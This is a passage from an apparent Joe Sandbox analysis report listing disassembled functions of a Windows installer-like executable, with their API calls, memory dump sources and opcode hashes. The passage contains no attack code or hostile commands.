                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                                                                                                                                                                                                                                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                                                                                                                                                                                                                                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Z
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3604996873-1505515367
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044CFD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DrawText$EmptyRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 182455014-2867612384
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042EF84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ...\
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2998766281-983595016
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00454DC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressByteCharMultiProcWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2508298434-591603554
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8f972abd232c763f3c36dc63a9cb065ea194a46f499b988bc3bcbbac73c3597
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8f972abd232c763f3c36dc63a9cb065ea194a46f499b988bc3bcbbac73c3597
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004538A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$_iu
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3498533004-10593223
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 07362118cdce437275e731559fb031e23df8ab72a9a9735788e52f6b9d753cfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07362118cdce437275e731559fb031e23df8ab72a9a9735788e52f6b9d753cfa
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                                                                                                                                                                                                                                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Class$InfoRegisterUnregister
                                                                                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3749476976-2766056989
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52ab2b6b56ae1e8b590a77f736e7a6459437f656fc00639e046372015fcf8e28
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52ab2b6b56ae1e8b590a77f736e7a6459437f656fc00639e046372015fcf8e28
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00497BE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                                                                                                                                                                                                                                                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$Attributes$Move
                                                                                                                                                                                                                                                                                                                                                                  • String ID: isRS-%.3u.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3839737484-3657609586
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d2f0ef2c8d2c69e59812858b9b2bb046ce1f180a5ea43ef50a61995ac20c358
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d2f0ef2c8d2c69e59812858b9b2bb046ce1f180a5ea43ef50a61995ac20c358
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044B39C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: A480A570ObjectSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1230475511-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExitMessageProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1220098344-2970929446
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0044B0D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                                                                                                                                                                                                                                                                                                                                  • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DrawText$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: k H
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 65125430-1447039187
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00456A34 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
